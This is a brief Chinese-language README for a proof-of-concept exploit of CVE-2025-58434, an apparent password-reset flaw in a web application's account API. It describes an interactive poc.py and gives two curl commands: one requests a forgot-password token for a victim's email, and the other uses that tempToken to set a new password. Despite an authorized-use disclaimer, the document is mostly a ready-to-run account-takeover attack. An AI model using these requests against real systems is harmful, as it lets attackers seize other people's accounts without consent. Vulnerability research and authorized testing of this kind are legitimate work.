用于触发 POST /api/v1/account/forgot-password 的 Python 概念验证脚本。
⚠️ 仅供教育和已获授权的安全研究使用。 将此工具用于你不拥有或未经书面许可测试的系统是违法的。
zaddy6 (Isaac David)arthurgervais (Arthur Gervais)CVE-2025-58434 的 PoCpoc.py: 提示输入机器 URL/IP、目标邮箱和密码(如果输入裸主机/IP 还会提示协议);然后发送请求并打印 HTTP 状态、响应头和响应正文,类似于 curl -i运行:
python3 poc.py
然后提供:
10.10.11.10、http://10.10.11.10 或 https://target.examplecurl -i -X POST https://<MACHINE_URL/IP>/api/v1/account/forgot-password \
-H "Content-Type: application/json" \
-d '{"user":{"email":"<[email protected]>"}}'
curl -i -X POST https://<target>/api/v1/account/reset-password \
-H "Content-Type: application/json" \
-d '{
"user":{
"email":"<[email protected]>",
"tempToken":"<tempToken>",
"password":"NewSecurePassword123!"
}
}'